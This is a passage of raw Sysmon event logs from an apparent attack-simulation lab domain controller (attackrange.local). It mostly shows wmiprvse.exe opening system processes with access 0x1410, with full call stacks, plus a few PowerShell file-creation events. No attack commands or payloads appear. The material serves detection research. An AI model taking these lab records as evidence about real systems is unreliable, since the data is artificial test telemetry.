4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_22euthgf.0vp.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vjjn251x.1zj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-AEAA-00000000AD01}14936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-AEAA-00000000AD01}14936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 